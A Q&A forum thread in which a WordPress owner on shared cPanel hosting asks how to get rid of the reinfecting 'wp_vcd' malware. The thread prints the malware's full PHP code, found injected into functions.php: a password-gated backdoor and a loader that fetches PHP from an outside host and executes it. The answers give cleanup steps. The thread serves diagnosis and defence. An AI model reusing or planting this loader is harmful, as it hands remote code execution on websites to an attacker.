cPanel Question posted in
The official documentation can be seen here.

PHP code in functions.php of all wordpress websites on my shared hosting – CPanel

I have a shared hosting and some wordpress websites on that.
Recently sometimes when I visit my websites, popup opens.
So I opened template directory of one wordpress website in Cpanel. this code was added on top of functions.php file:

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
    {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action'])
        {
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
        {
        if (!empty($_REQUEST['newdomain']))
            {
            if ($file = @file_get_contents(__FILE__))
                {
                if (preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code9.php/i', $file, $matcholddomain))
                    {
                    $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                    }
                }
            }
        }

    break;

default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

die("");
}

if (!function_exists('theme_temp_setup'))
    {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
        {
        if ($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=" . $path))
            {
            function theme_temp_setup($phpCode)
                {
                $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?phpn" . $phpCode);
                fclose($handle);
                include $tmpfname;

                unlink($tmpfname);
                return get_defined_vars();
                }

            extract(theme_temp_setup($tmpcontent));
            }
        }
    }

?>

So I deteled that and popup problem solved. I deleted that from functions.php files of all websites But
Now problem is that when I visit functions.php of any websites, the code is there again and its in all themes even unused themes.
What can I do?

What I did to slove problem

  1. In wp-include directory, delete wp-vcd.php and class.wp.php
    files
  2. In wp-include directory, open post.php and detele first php tag
    added by Malware.
  3. Open to theme’s functions.php file, and delete the above codes.

This should stop popups. But I don’t now how long it works.

I still didn’t find the main file that infect all websites, but tying to find out.

Tags:

4

Answers


  1. 0

    Apparently your site has been compromised (hacked).
    You can contact your hosting provider, they probably (surely) will not help you.
    You can contact a web site security company, I use sucuri.net.
    If you want to clean it yourself, there are 2 options

    • delete EVERYTHING and reinstall all the sites, including the database!
    • if you cannot reinstall everything, you’ll have to check script per script to find “weird” code and clean it. If you find a few keywords that repeat (for example the code9 that shows your code, you can look for this, but probably sometimes it’s code9 and sometimes is a different name.
    • update as much as you can, as plugins, template and of course your wordpress version.
    Login or Signup to reply.
  2. 0

    I know this answer is very late but I’ll share my experience to help any one who has this problem.
    cause of this issue can be a plugin that you downloaded from outside of wordpress.org or some body has access to your wordpress admin account and you doesn’t already close editor.php in appearance tab or hacker has your ftp user and password or …
    to solve this create a full backup first and save it in your computer in case of doing any mistake and then:

    1. go to theme directory of your wordpress site and delete all of the unused theme because they are infected already.
    2. in active theme edit your functions.php file and delete all extra code inserted by malware. you can search for wp_vcd or wp-tmp words to find the code.
    3. download latest wordpress installation. then delete wp-include and wp-admin folder and all files in public_html except wp-content folder and .htaccess file and wp-config.php file. after that replace deleted files and folder with downloaded wordpress.
    4. remove all plugins that you downloaded from known source.
    5. finally change all of your passwords like ftp, admin panel, cpanel or direct admin and … in case if hacker saved your info somewhere.

    hope this little guide can help someone.

    Login or Signup to reply.
  3. 0

    No need to do ton of such changes, simply do these two steps >>

    1 > Dashboard > Updates > “Re-install Now”
    This will re-install latest version of WordPress, overwriting infected wp core files.

    2 > Now open theme functions.php file in editor and remove malicious code snippet and hit save.

    All done! this time it will accept the file changes to remove infected code from functions.php file.

    Login or Signup to reply.
  4. 0

    Temporary fix to this issue is to remove the hack code and make your functions.php read-only(chmod 444 functions.php) You can do this also from your cPanel as well. After that site will be ok. Note it just doesn’t affect the current theme only, it will affect all of your themes in the theme directory. So do the same for all functions.php in all themes. Download the site to your local and do a find in file search for the keyword wp_vcd. It will be helpful if you had WordFence security plugin in your system free version as it comes in its logs as well. List of files infected.

    //FILES TO REMOVE
wp-includes/wp-vcd.php

wp-includes/wp-tmp.php

wp-includes/wp-feed.php
wp-content/themes/yourtheme/wp-tmp.php


// FILES TO CORRECT
    wp-content/themes/yourtheme/functions.php

    wp-content/themes/yourtheme-child/functions.php

    wp-content/themes/twentynineteen/functions.php

    wp-content/themes/twentysixteen/functions.php

    wp-content/themes/twentyseventeen/functions.php

    wp-includes/post.php

    There will be more files WordFence log will help you to find this on that keyword search.

    If you can access your backend then install WordFense security plugin as soon as possible and look for its scan report. It will show the modified or newly created files. After removing/fixing the files do a scan from WordFence once again to confirm.

    Please verify the file/folder permissions on your server.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search